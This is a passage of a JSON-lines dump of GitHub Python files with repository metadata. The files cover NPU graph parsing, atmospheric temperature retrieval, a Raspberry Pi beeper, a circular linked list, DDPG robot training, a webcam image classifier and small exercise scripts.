return\n if op.name() not in dot_list:\n dot.node(op.name(), self._gen_sub_graph_label(op), color=color, tooltip=op.summary(True))\n dot_list.append(op.name())\n # add input and output\n for desc in op.inputs():\n sub_op = self.get_op(desc.name(), op.graph_name)\n if len(sub_op) != 0:\n sub_op = sub_op[0]\n if direction in ['all', 'input']:\n self._gen_sub_graph(dot, sub_op, deep - 1, dot_list, edge_list, direction='input')\n if sub_op.name() in dot_list:\n src_edge = '%s:o%d' % (sub_op.name(), desc.peer_idx())\n else:\n dot.node(sub_op.name(), self._gen_sub_graph_label(sub_op), color=color, tooltip=op.summary(True))\n src_edge = '%s:o%d' % (sub_op.name(), desc.peer_idx())\n dst_edge = '%s:i%d' % (op.name(), desc.idx())\n if src_edge + dst_edge not in edge_list:\n dot.edge(src_edge, dst_edge)\n edge_list.append(src_edge + dst_edge)\n # add output\n for desc in op.outputs():\n for out_node_name in desc.names():\n sub_op = self.get_op(out_node_name, op.graph_name)\n if len(sub_op) != 0 and direction in ['all', 'output']:\n sub_op = sub_op[0]\n self._gen_sub_graph(dot, sub_op, deep - 1, dot_list, edge_list, direction='output')\n\n def _gen_sub_graph_label(self, op):\n input_labels = []\n for desc in op.inputs():\n input_labels.append(self._gen_sub_graph_desc(desc, 'i'))\n output_labels = []\n for desc in op.outputs():\n output_labels.append(self._gen_sub_graph_desc(desc, 'o'))\n str_cell = '|'\n return '{{ %s } | [%s] %s | { %s }}' % (str_cell.join(input_labels), op.type(), op.name(),\n str_cell.join(output_labels))\n\n @staticmethod\n def _gen_sub_graph_desc(desc, id_prefix):\n desc_str = r'<%s%d> [%d]' % (id_prefix, desc.idx(), desc.idx())\n desc_str = r'%s [%s]' % (desc_str, desc.dtype()) if desc.dtype() != '' else desc_str\n desc_str = r'%s\\n%s' % (desc_str, desc.shape()) if len(desc.shape()) != 0 else desc_str\n return desc_str\n\n def list_ops(self, op_type='', op_name='', pass_name='', kernel_name=''):\n \"\"\"list ops in graph\"\"\"\n return filter(lambda op: op_type in op.type() and op_name in op.name() and (\n pass_name == '' or pass_name in op.pass_name()) and kernel_name in op.kernel_name(), self.ops_list)\n\n def get_op(self, name, graph_name=None):\n \"\"\"get op by name\"\"\"\n # get op in specific sub graph\n if graph_name is not None and graph_name in self.sub_graphs:\n return self.sub_graphs[graph_name].get_op(name)\n ops = []\n for sub_graph in self.sub_graphs.values():\n ops.extend(sub_graph.get_op(name))\n # check if there is an exact match operation\n match_ops = list(filter(lambda x: x.name() == name, ops))\n if len(match_ops) != 0:\n return match_ops\n # return guess operations by name\n self.log.info(\"Can not find Operator named %s. You may mean the operator bellow.\", name)\n guess_op_name_list = ['[green][%s][/green] %s' % (x.type(), x.name()) for x in ops]\n util.print_panel(Constant.NEW_LINE.join(guess_op_name_list), title='Possible Operators')\n return ops\n\n def get_parent_node_by_subgraph_name(self, graph_name):\n ops = []\n for sub_graph in self.sub_graphs.values():\n ops.extend(sub_graph.get_parent_node_by_subgraph_name(graph_name))\n return ops\n\n def _prepare_npu_graphs(self):\n \"\"\"prepare ge graphs \"\"\"\n # move graphs to precision data dir\n graph_files = util.list_ge_graph_files(self.graph_root)\n self.build_files = sorted(filter(lambda x: x.graph_name == cfg.BUILD_JSON_GRAPH_NAME, graph_files.values()),\n key=lambda x: x.graph_id)\n if len(self.build_files) == 0:\n self.log.warning(\"Can not find any build files in dir: %s\", self.graph_root)\n self.log.info(\"Find [%d] GE build files.\", len(self.build_files))\n\n @catch_tool_exception\n def _parse_ops(self, build_file):\n \"\"\"Parse *_Build.txt.json to op objects.\"\"\"\n build_file_json = build_file.path + '.json'\n build_file_json = util.convert_proto_to_json(build_file.path, build_file_json)\n if build_file_json is not None:\n self.build_json_files.append(build_file_json)\n with open(build_file_json, 'r') as f:\n graph_json = json.load(f)\n if 'graph' not in graph_json:\n raise PrecisionToolException(\"No graph in file: %s\" % build_file.file_name)\n if len(graph_json['graph']) != 1:\n self.log.warning(\"There are more then one graph in ge build file, find %d\" % len(graph_json['graph']))\n # sub_graphs = []\n for graph in graph_json['graph']:\n npu_sub_graph = NpuSubGraph(graph, build_file, self)\n self.sub_graphs[graph['name']] = npu_sub_graph\n self.ops_list.extend(npu_sub_graph.ops_list.values())\n","repo_name":"Ascend/tools","sub_path":"precision_tool/lib/graph/npu_graph.py","file_name":"npu_graph.py","file_ext":"py","file_size_in_byte":13868,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"33158737400","text":"import math\n\nimport util\n\n\ndef q_inf(sheet, row, col):\n #количество информации для ячейки\n base = sheet.nrows\n value = 0\n for row_ind in range(0, sheet.nrows):\n if sheet.cell(row_ind, col).value == sheet.cell(row, col).value:\n value += 1\n l = math.log(value, base)\n print(\"log(base=%s, value=%s) = %s | (row=%s,col=%s) \" % (base, value, l, row, col))\n return l","repo_name":"G0DZ/Semantic","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13999279477","text":"from full_physics import *\nimport numpy as np\nimport math\n\nclass TemperatureEcmwf(TemperatureImpBase):\n '''This class uses ECMWF data + offset to calculate the temperature'''\n def __init__(self, ecmwf, press, temp_offset = 0.0, temp_flag = True):\n coef = np.array([temp_offset])\n flag = np.array([temp_flag])\n TemperatureImpBase.__init__(self,coef, flag, press, False)\n self.ecmwf = ecmwf\n\n def offset(self):\n return self.coefficient()[0]\n\n def offset_uncertainty(self):\n cov = self.statevector_covariance()\n if(cov.shape[0] > 0 and cov[0,0] > 0):\n return math.sqrt(cov[0,0]) \n else:\n return 0\n\n def clone(self, press = None):\n if(not press):\n press = self.pressure()\n res = TemperatureEcmwf(self.ecmwf, press,\n self.coefficient().value()[0],\n self.used_flag_value()[0])\n return res\n \n def calc_temperature_grid(self):\n t = np.array(self.ecmwf.temperature(self.pressure().pressure_grid()))\n t += self.offset()\n self.tgrid = np_to_array_ad(t)\n\n def state_vector_name_i(self, i):\n return \"Temperature offset (Kelvin)\"\n\n def desc(self):\n return '''\nTemperatureEcmwf:\n Temperature offset: %f\n Retrieval flag: %s\n''' %(self.coefficient().value()[0], self.used_flag_value()[0].__str__()) + \\\n \" Pressure: \\n\" + self.pressure().__str__() + \\\n \" ECMWF:\\n\" + self.ecmwf.__str__()\n\n\nclass TemperatureEcmwfOutput(RegisterOutputBase):\n def __init__(self, temp):\n RegisterOutputBase.__init__(self)\n self.temp = temp\n\n def register_output(self, out):\n out.register_double(\"/RetrievalResults/temperature_offset_fph\",\n lambda : self.temp.offset().value())\n out.register_double(\"/RetrievalResults/temperature_offset_uncert_fph\",\n lambda : self.temp.offset_uncertainty())\n\n def register_output_apriori(self, out):\n frozen = self.temp.clone()\n out.register_double(\"/RetrievalResults/temperature_offset_apriori_fph\",\n lambda : frozen.offset().value())\n\n# We may want to create a base class for this at some point\nclass CreatorTemperatureEcmwf:\n def __init__(self,lg):\n self.c = lg.Creator.new(lg.Creator)\n self.c.initial_guess = self.initial_guess\n self.c.create = self.create\n self.c.register_output = self.register_output\n\n def create(self,c):\n self.temp = TemperatureEcmwf(c.config.ecmwf(c.config), \n c.config.pressure, \n c.initial_guess(c).apriori()[0])\n return self.temp\n\n def initial_guess(self,c):\n read_t = c.offset\n read_t.config = c.config\n ig = InitialGuessValue()\n ig.apriori(read_t.apriori(read_t))\n ig.apriori_covariance(read_t.covariance(read_t))\n return ig\n def register_output(self,c,ro):\n ro.push_back(ro, TemperatureEcmwfOutput(self.temp))\n\n\n\n","repo_name":"nasa/RtRetrievalFramework","sub_path":"python_experimental/temperature_ecmwf.py","file_name":"temperature_ecmwf.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"21"} +{"seq_id":"19943875593","text":"import os\nos.system('clear') or None\n\ndef manipulacao_arquivo(numero):\n nome_arquivo = str(numero) + \".json\"\n arquivo = open(nome_arquivo,\"r\")\n\n json_string = arquivo.read()\n\n retirados = [\"Exercicios\",\"\\n\",\"[\",\"]\",\"\\\"\",\":\",\" \",\"{\",\"}\"]\n\n clean_string = json_string\n\n for i in range(0,len(retirados)):\n clean_string = clean_string.replace(retirados[i],\"\")\n\n clean_list = clean_string.split(\",\")\n\n return clean_list\n\n\ndef print_categoria(categoria):\n\n if(categoria == 1):\n print(\"Iniciante\")\n elif(categoria == 2):\n print(\"AD-HOC\")\n elif(categoria == 3):\n print(\"Strings\")\n elif(categoria == 4):\n print(\"Estruturas e Bibliotecas\")\n elif(categoria == 5):\n print(\"Matemática\")\n elif(categoria == 6):\n print(\"Paradigmas\")\n elif(categoria == 7):\n print(\"Grafos\")\n elif(categoria == 8):\n print(\"Geometria Computacional\")\n elif(categoria == 9):\n print(\"SQL\")\n\ndef ordenacao_dificuldade(lista_completa,quantos):\n \n dificuldades = []\n exercicios = []\n \n for i in range(1,len(lista_completa),2):\n dificuldades.append(lista_completa[i])\n for i in range(0,len(lista_completa),2):\n exercicios.append(lista_completa[i])\n \n for i in range(0,len(exercicios)):\n for j in range(0,len(exercicios)-1):\n if(int(dificuldades[j]) > int(dificuldades[j+1])):\n \n aux = dificuldades[j]\n dificuldades[j] = dificuldades[j+1]\n dificuldades[j+1] = aux\n\n aux = exercicios[j]\n exercicios[j] = exercicios[j+1]\n exercicios[j+1] = aux\n\n x = 1\n for i in range(0,len(exercicios)):\n if(int(dificuldades[i]) == int(x)):\n \n print(\"\\n\" + \"----------\" + \"Dificuldade \" + str(x) + \"----------\")\n x = x + 1\n \n print(exercicios[i])\n \n print(\"\")\n \n if(quantos != 0):\n for i in range(0,len(exercicios)):\n x=0\n while(x < quantos):\n print(exercicios[i],end=\" \")\n x = x + 1\n print(\"\")\n\ndef ordenacao_exercicio(dificuldade,lista_completa,quantos):\n \n dificuldades = []\n exercicios = []\n \n for i in range(1,len(lista_completa),2):\n dificuldades.append(lista_completa[i])\n for i in range(0,len(lista_completa),2):\n exercicios.append(lista_completa[i])\n \n if(dificuldade == 1):\n for i in range(0,len(exercicios)):\n print(exercicios[i] + \"|\" + str(dificuldades[i]))\n elif(dificuldade == 2):\n for i in range(0,len(exercicios)):\n print(exercicios[i])\n\n \n\n\n\n# Filtragem\n\n'''\nCategorias\n# [1] - Iniciante\n# [2] - AD-HOC\n# [3] - Strings\n# [4] - Estruturas e Bibliotecas\n# [5] - Matemática\n# [6] - Paradigmas\n# [7] - Grafos\n# [8] - Geometria Computacional\n# [9] - SQL\n'''\ncategoria = 1\n\n\n'''\nOrganização (forma como é ordenado)\n[1] - Ordem crescente (numero)\n[2] - Ordem crescente (dificuldade/nível)\n'''\norganizacao = 2\n\n\n'''\nQuantos = Separação de exercicios (Lista completa = 0)\nExemplo: 2\n1001 1002\n1003 1004\nExemplo: 3\n1001 1002 1003\n1004 1005 1006\n'''\nquantos = 0\n\n'''\nDificuldade\nImprimir com dificuldade?\n[1] - Sim\n[2] - Nao\n'''\ndificuldade = 0\nlista_completa = manipulacao_arquivo(categoria)\n\nif(organizacao == 1):\n print_categoria(categoria)\n ordenacao_exercicio(dificuldade,lista_completa)\nif(organizacao == 2):\n print_categoria(categoria)\n ordenacao_dificuldade(lista_completa,quantos)\n\n\n\n","repo_name":"Donderileo/Scrapy-URI","sub_path":"sem_menus.py","file_name":"sem_menus.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34010259421","text":"# Beeper.py\n\n'''\nClass that represents an active buzzer on some GPIO port.\n\n \n This software is part of the raspibrick module.\n It is Open Source Free Software, so you may\n - run the code for any purpose\n - study how the code works and adapt it to your needs\n - integrate all or parts of the code in your own programs\n - redistribute copies of the code777\n - improve the code and release your improvements to the public\n However the use of the code is entirely your responsibility.\n'''\n\nimport SharedConstants\nfrom RobotInstance import RobotInstance\nfrom Tools import Tools\nfrom threading import Thread\nimport RPi.GPIO as GPIO\nimport time\n\n\nclass Beeper():\n '''\n Abstraction of the beeper attached to given port (and ground).\n @param port: the GPIO port number (default: 40)\n '''\n def __init__(self, pin = 40):\n self._checkRobot()\n self.robot = RobotInstance.getRobot()\n self._pin = pin\n self._beeperThread = None\n Tools.debug(\"Beeper instance created with beeper at pin: \" + str(pin))\n GPIO.setup(pin, GPIO.OUT)\n self.turnOff()\n \n def turnOn(self):\n '''\n Turns the beeper on.\n '''\n Tools.debug(\"Beeper turned on\")\n GPIO.output(self._pin, GPIO.HIGH)\n\n def turnOff(self):\n '''\n Turns the beeper off.\n '''\n Tools.debug(\"Beeper turned off\")\n GPIO.output(self._pin, GPIO.LOW)\n\n def beep(self, count = 1):\n '''\n Emits a short beep the given number of times. Blocking until the beeps are played.\n @param count: the number of beeps\n '''\n self.start(60, 120, count, True)\n \n def start(self, onTime, offTime, count = 0, blocking = False):\n '''\n Starts beeping. The beeping period is offTime + onTime. \n May be stopped by calling stop(). If blocking is False, the\n function returns immediately while the blinking goes on. The blinking is stopped by setColor().\n @param onTime: the time in ms in on state\n @param offTime: the time in ms in off state\n @param count: total number of on states; 0 for endlessly (default)\n @param blocking: if True, the method blocks until the beeper has finished; otherwise\n it returns immediately (default: False)\n '''\n Tools.debug(\"Starting beeper with params onTime = \" + str(onTime) + \n \" offTime = \" + str(offTime) + \n \" count = \" + str(count) + \n \" blocking = \" + str(blocking))\n if self._beeperThread != None:\n self.stop()\n self._beeperThread = BeeperThread(self, onTime, offTime, count)\n if blocking:\n while self.isBeeping():\n continue\n\n def setOffTime(self, offTime):\n '''\n Sets the time the speaker is off.\n @param offTime: the offTime in ms\n '''\n if self._beeperThread != None:\n self._beeperThread._offTime = offTime\n\n def setOnTime(self, onTime):\n '''\n Sets the time the speaker is on.\n @param onTime: the onTime in ms\n '''\n if self._beeperThread != None:\n self._beeperThread._onTime = onTime\n\n def setOnOffTime(self, onTime, offTime):\n '''\n Sets the time the speaker is on and off.\n @param onTime: the onTime in ms\n @param offTime: the offTime in ms\n '''\n if self._beeperThread != None:\n self._beeperThread._onTime = onTime\n self._beeperThread._offTime = offTime\n \n def stop(self):\n '''\n Stops beeping.\n '''\n if self._beeperThread != None:\n self._beeperThread.stop()\n\n def isBeeping(self):\n '''\n @return: True, if the beeper is active; otherwise False\n '''\n time.sleep(0.001)\n return self._beeperThread != None\n \n \n def _checkRobot(self):\n if RobotInstance.getRobot() == None:\n raise Exception(\"Create Robot instance first\")\n\n\n\n\n# ------------------- class BeeperThread ----------------------\nclass BeeperThread(Thread):\n def __init__(self, beeper, onTime, offTime, count):\n Thread.__init__(self)\n self._beeper = beeper\n self._onTime = onTime\n self._offTime = offTime\n self._count = count\n self._isAlive = True\n self.start()\n\n def run(self):\n Tools.debug(\"Beeper thread started\")\n nb = 0\n self._isRunning = True\n while self._isRunning:\n if self._onTime <= 0:\n self._beeper.turnOff()\n time.sleep(0.01)\n else:\n self._beeper.turnOn()\n startTime = time.time()\n while time.time() - startTime < self._onTime / 1000 and self._isRunning:\n time.sleep(0.001)\n if not self._isRunning:\n break\n \n self._beeper.turnOff()\n startTime = time.time()\n while time.time() - startTime < self._offTime / 1000 and self._isRunning:\n time.sleep(0.001)\n if not self._isRunning:\n break\n\n nb += 1\n if nb == self._count:\n self._isRunning = False\n self._beeper.turnOff()\n self._beeper._beeperThread = None\n self._isAlive = False\n Tools.debug(\"Beeper thread finished\")\n\n def stop(self):\n self._isRunning = False\n while self._isAlive: # Wait until thread is finished\n continue\n","repo_name":"raspibrick/install","sub_path":"lib/Beeper.py","file_name":"Beeper.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72501255094","text":"from ..Linear.DLL import DLL\r\nfrom ..nodes.DNode import DNode\r\n\r\n\r\nclass CDLL(DLL):\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n\r\n def __init__(self, head=None):\r\n if head is None:\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n else:\r\n self.head = head\r\n self.tail = head\r\n self.head.prev = self.tail\r\n self.tail.next = self.head\r\n self.size = 1\r\n\r\n def InsertHead(self, node):\r\n if self.head is None:\r\n self.head = node\r\n self.tail = node\r\n node.prev = node\r\n node.next = node\r\n else:\r\n node.next = self.head\r\n self.head.prev = node\r\n self.head = node\r\n node.prev = self.tail\r\n self.tail.next = node\r\n self.size += 1\r\n\r\n def InsertTail(self, node):\r\n if self.head is None:\r\n self.head = node\r\n self.tail = node\r\n node.prev = node\r\n node.next = node\r\n else:\r\n node.prev = self.tail\r\n node.next = self.head\r\n self.tail.next = node\r\n self.head.prev = node\r\n self.tail = node\r\n self.size += 1\r\n\r\n def Insert(self, node, position):\r\n if position < 1 or position > self.size + 1:\r\n print(\"Invalid position!\")\r\n return\r\n if position == 1:\r\n if self.head is None: # empty list\r\n self.head = node\r\n self.tail = node\r\n node.prev = node # self-referencing\r\n node.next = node # self-referencing\r\n else:\r\n node.next = self.head\r\n self.head.prev = node\r\n self.head = node\r\n self.head.prev = self.tail # link head to tail\r\n self.tail.next = self.head # link tail to head\r\n elif position == self.size + 1:\r\n self.tail.next = node\r\n node.prev = self.tail\r\n self.tail = node\r\n self.head.prev = self.tail # link head to tail\r\n self.tail.next = self.head # link tail to head\r\n else:\r\n current = self.head\r\n for i in range(1, position - 1):\r\n current = current.next\r\n node.next = current.next\r\n current.next.prev = node\r\n current.next = node\r\n node.prev = current\r\n self.size += 1\r\n\r\n def Search(self, node):\r\n if self.head is None:\r\n return None\r\n curr_node = self.head\r\n while True:\r\n if curr_node.data == node.data:\r\n return curr_node\r\n curr_node = curr_node.next\r\n if curr_node is self.head:\r\n break\r\n return None\r\n\r\n def SortedInsert(self, node):\r\n if self.head is None: # if list is empty\r\n self.InsertHead(node)\r\n return\r\n\r\n if not self.isSorted(): # if list is not sorted\r\n self.Sort() # sort the list before inserting the node\r\n\r\n current = self.head\r\n previous = None\r\n\r\n while current is not None and current.data < node.data:\r\n previous = current\r\n current = current.next\r\n if current == self.head: # reached end of the list, insert at tail\r\n self.InsertTail(node)\r\n return\r\n\r\n if previous is None: # insert at head\r\n self.InsertHead(node)\r\n elif current is None: # insert at tail\r\n self.InsertTail(node)\r\n else: # insert at specific position\r\n node.prev = previous\r\n node.next = current\r\n current.prev = node\r\n previous.next = node\r\n self.size += 1\r\n\r\n def isSorted(self):\r\n if self.head is None:\r\n return True\r\n\r\n current = self.head\r\n while current.next != self.head:\r\n if current.data > current.next.data:\r\n return False\r\n current = current.next\r\n return True\r\n\r\n def DeleteHead(self):\r\n if self.head is None:\r\n return None\r\n else:\r\n temp = self.head\r\n self.head = self.head.next\r\n if self.head is not None:\r\n self.head.prev = self.tail # point the new head's prev to the tail\r\n self.tail.next = self.head # point the tail's next to the new head\r\n else:\r\n self.tail = None\r\n temp.next = None\r\n temp.prev = None\r\n self.size -= 1\r\n return temp\r\n\r\n def DeleteTail(self):\r\n if self.tail is None:\r\n return None\r\n elif self.head == self.tail:\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n else:\r\n self.tail = self.tail.prev\r\n self.tail.next = self.head # close the loop\r\n self.head.prev = self.tail # update prev attribute of head node\r\n self.size -= 1\r\n\r\n def Delete(self, node):\r\n if self.head == node:\r\n self.head = node.next\r\n if self.head == self.tail: # if only one node in the list\r\n self.head.next = None\r\n self.tail.prev = None\r\n self.head.prev = None\r\n self.tail.next = None\r\n self.tail = self.head\r\n else:\r\n self.head.prev = None\r\n self.tail.next = self.head\r\n self.size -= 1\r\n return node\r\n\r\n current = self.head\r\n while current is not None and current != node:\r\n current = current.next\r\n\r\n if current is not None:\r\n if current == self.tail:\r\n self.tail = current.prev\r\n self.tail.next = self.head\r\n self.head.prev = self.tail\r\n else:\r\n current.prev.next = current.next\r\n current.next.prev = current.prev\r\n\r\n current.next = None\r\n current.prev = None\r\n self.size -= 1\r\n return current\r\n\r\n return None\r\n\r\n def Sort(self):\r\n if self.head is None or self.head.next is None:\r\n return\r\n\r\n while True:\r\n swapped = False\r\n prev = None\r\n curr = self.head\r\n while curr.next is not None and curr.next != self.head:\r\n if curr.data > curr.next.data:\r\n if prev is not None:\r\n prev.next = curr.next\r\n else:\r\n self.head = curr.next\r\n temp = curr.next.next\r\n curr.next.next = curr\r\n curr.next.prev = curr.prev\r\n curr.prev.next = curr.next\r\n curr.prev = curr.next\r\n curr.next = temp\r\n if temp is not None:\r\n temp.prev = curr\r\n prev = curr\r\n swapped = True\r\n else:\r\n prev = curr\r\n curr = curr.next\r\n\r\n if not swapped:\r\n break\r\n\r\n self.tail = curr\r\n\r\n def Clear(self):\r\n return super().Clear()\r\n\r\n def Print(self):\r\n print(f\"List size: {self.size}\")\r\n if self.isSorted():\r\n print(\"Sorted: Yes\")\r\n else:\r\n print(\"Sorted: No\")\r\n current = self.head\r\n print(\"Contents of list are...\\n\")\r\n while current is not None:\r\n print(current.data)\r\n current = current.next\r\n if current == self.head: # reached end of list and looped back to head\r\n break\r\n","repo_name":"SufyanAyaz/Data_Structures_Library_Project","sub_path":"myLib/datastructures/Linear/CDLL.py","file_name":"CDLL.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17808139245","text":"import numpy as np\nfrom ddpg import DDPG\nfrom ou_noise import OUNoise\nfrom environment.vrep_env import Env\nimport os\n\n#specify parameters here:\nepisodes=30000\nis_batch_norm = False #batch normalization switch\n\ndef main():\n env = Env(19997)\n steps= 10000\n num_states = 59\n num_actions = 3\n\n #Randomly initialize critic,actor,target critic, target actor network and replay buffer \n agent = DDPG(env, is_batch_norm)\n exploration_noise = OUNoise(num_actions)\n counter=0\n reward_per_episode = 0 \n total_reward=0\n reward_st = np.array([0])\n\n agent.actor_net.load_actor(os.getcwd() + '/weights/actor/model.ckpt')\n agent.critic_net.load_critic(os.getcwd() + '/weights/critic/model.ckpt')\n \n for i in range(episodes):\n # print \"==== Starting episode no:\",i,\"====\",\"\\n\"\n observation = env.reset()\n done =False\n reward_per_episode = 0\n for t in range(steps):\n x = observation\n action = agent.evaluate_actor(np.reshape(x,[1,num_states]))\n noise = exploration_noise.noise()\n action = action[0] + noise #Select action according to current policy and exploration noise\n \n for i in range(num_actions):\n if action[i] > 1.0:\n action[i] = 1.0\n if action[i] < -1.0:\n action[i] = -1.0\n\n observation,reward,done = env.step(action)\n print(\"reward:\", reward, \"\\n\")\n agent.add_experience(x,observation,action,reward,done)\n #train critic and actor network\n if counter > 64: \n agent.train()\n reward_per_episode+=reward\n counter+=1\n #check if episode ends:\n if (done or (t == steps-1)):\n print('Episode',i,'Steps: ',t,'Episode Reward:',reward_per_episode)\n exploration_noise.reset()\n reward_st = np.append(reward_st,reward_per_episode)\n np.savetxt('episode_reward.txt', reward_st, newline=\"\\n\")\n agent.actor_net.save_actor(os.getcwd() + '/weights/actor/model.ckpt')\n agent.critic_net.save_critic(os.getcwd() + '/weights/critic/model.ckpt')\n break\n total_reward+=reward_per_episode \n\nif __name__ == '__main__':\n main() ","repo_name":"seongwonleee/CNN-DDPG-locked","sub_path":"Mecanum/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25209980908","text":"# La Croix Flavor Detector - Machine Learning on Raspberry Pi\n#\n# Michael D'Argenio\n# mjdargen@gmail.com\n# https://dargenio.dev\n# https://github.com/mjdargen\n# Created: February 6, 2020\n# Last Modified: February 27, 2020\n#\n# This program uses Tensorflow and OpenCV to detect objects in the video\n# captured from your webcam. This program is meant to be used with machine\n# learning models generated with Teachable Machine.\n#\n# Teachable Machine is a great machine learning model trainer and generator\n# created by Google. You can use Teachable Machine to create models to detect\n# objects in images, sounds in audio, or poses in images. For more info, go to:\n# https://teachablemachine.withgoogle.com/\n#\n# For this project, you will be generating a image object detection model. Go\n# to the website, click \"Get Started\" then go to \"Image Project\". Follow the\n# steps to create a model. Export the model as a \"Tensorflow->Keras\" model.\n#\n# To run this code in your environment, you will need to:\n# * Install Python 3 packages & library dependencies\n# * Use installation shell script\n# * Export your teachable machine tensorflow keras model and unzip it.\n# * You need both the .h5 file and labels.txt\n# * Update model_path to point to location of your keras model\n# * Update labels_path to point to location of your labels.txt\n# * Adjust width and height of your webcam for your system\n# * Adjust frameWidth with your video feed width in pixels\n# * Adjust frameHeight with your video feed height in pixels\n# * My RPi Camera v1.3 works well with 1024x768\n# * Set your confidence threshold\n# * conf_threshold by default is 90\n# * If video does not show up properly, use the matplotlib implementation\n# * Uncomment \"import matplotlib....\"\n# * Comment out \"cv2.imshow\" and \"cv2.waitKey\" lines\n# * Uncomment plt lines of code below\n# * Run \"sudo python3 hackathon.py\"\n\nimport multiprocessing\nimport numpy as np\nimport cv2\nimport tensorflow.keras as tf\nimport pyttsx3\nimport math\nimport time\nimport RPi.GPIO as GPIO\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\n# use matplotlib if cv2.imshow() doesn't work\n# import matplotlib.pyplot as plt\n\n\n# disable scientific notation for clarity\nnp.set_printoptions(suppress=True)\n\n# Pin Definitions\nclass_pin = [12,16,18,22] # BCM pin 18, BOARD pin 12\n\n# Pin Setup:\nGPIO.setmode(GPIO.BOARD) # BOARD pin-numbering scheme from Raspberry Pi\n# set pin as an output pin with optional initial state of LOW\nfor i in range(len(class_pin)):\n GPIO.setup(class_pin[i], GPIO.OUT, initial=GPIO.LOW)\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.resolution = (224, 224)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=camera.resolution)\n# allow the camera to warmup\ntime.sleep(0.1)\n\n# read labels.txt file to get labels\nlabels_path = \"../labels.txt\"\n# open input file label.txt\nlabelsfile = open(labels_path, 'r')\n\n# initialize classes and read in lines until there are no more\nclasses = []\nline = labelsfile.readline()\nwhile line:\n # retrieve just class name and append to classes\n classes.append(line.split(' ', 1)[1].rstrip())\n line = labelsfile.readline()\n# close label file\nlabelsfile.close()\n\n# load the teachable machine model previously trained by teachable_machine \nmodel_path = '../keras_model.h5'\nmodel = tf.models.load_model(model_path, compile=False)\n\nframeHeight = frameWidth = 224\n\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n image = frame.array\n\n # Create the array of the right shape to feed into the keras model.\n # We are inputting 1x 224x224 pixel RGB image.\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\n # turn the image into a numpy array\n image_array = np.asarray(image)\n # normalize the image\n normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\n # load the image into the array\n data[0] = normalized_image_array\n\n # run the prediction. In the prediction, we have the % for all classes for classification\n predictions = model.predict(data)\n\n # confidence threshold is 90% so a class is recognize if its confidence % is over this threshold\n conf_threshold = 90\n confidence = []\n conf_label = \"\"\n threshold_class = \"\"\n # create black border at bottom for labels\n per_line = 1 # number of classes per line of text\n bordered_frame = cv2.copyMakeBorder(\n image,\n top=0,\n bottom=30 + 15*math.ceil(len(classes)/per_line),\n left=0,\n right=0,\n borderType=cv2.BORDER_CONSTANT,\n value=[0, 0, 0]\n )\n # for each one of the classes\n for i in range(0, len(classes)):\n # scale prediction confidence to % and apppend to 1-D list\n confidence.append(int(predictions[0][i]*100))\n # put text per line based on number of classes per line\n if (i != 0 and not i % per_line):\n cv2.putText(\n img=bordered_frame,\n text=conf_label,\n org=(int(0), int(frameHeight+25+15*math.ceil(i/per_line))),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.5,\n color=(255, 255, 255)\n )\n conf_label = \"\"\n # append classes and confidences to text for label\n conf_label += classes[i] + \": \" + str(confidence[i]) + \"%; \"\n # prints last line\n if (i == (len(classes)-1)):\n cv2.putText(\n img=bordered_frame,\n text=conf_label,\n org=(int(0), int(frameHeight+25+15*math.ceil((i+1)/per_line))),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.5,\n color=(255, 255, 255)\n )\n conf_label = \"\"\n # if above confidence threshold, send to queue\n if confidence[i] > conf_threshold:\n threshold_class = classes[i]\n GPIO.output(class_pin[i], True) # switch on the LED\n else:\n GPIO.output(class_pin[i], False) # Switch off the LED\n # add label class above confidence threshold\n cv2.putText(\n img=bordered_frame,\n text=threshold_class,\n org=(int(20), int(frameHeight)),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.75,\n color=(255, 255, 255)\n )\n \n # clear the stream in preparation for the next frame\n rawCapture.truncate(0)\n \n # original video feed implementation\n cv2.imshow(\"Capturing\", bordered_frame)\n cv2.waitKey(10)\n\n # # if the above implementation doesn't work properly\n # # comment out two lines above and use the lines below\n # # will also need to import matplotlib at the top\n # plt_frame = cv2.cvtColor(bordered_frame, cv2.COLOR_BGR2RGB)\n # plt.imshow(plt_frame)\n # plt.draw()\n # plt.pause(.001)\n\n\n","repo_name":"raiv-toulouse/RPi_lab2","sub_path":"hackathon.py","file_name":"hackathon.py","file_ext":"py","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32478457746","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the largestRectangle function below.\n\nglobal curStreak\ncurStreak = []\n\ndef largestRectangle(h):\n largest = 0\n \n for i in range(len(h)):\n size = 1\n prev = i - 1\n while prev >= 0 and h[prev] >= h[i]:\n size += 1\n prev -= 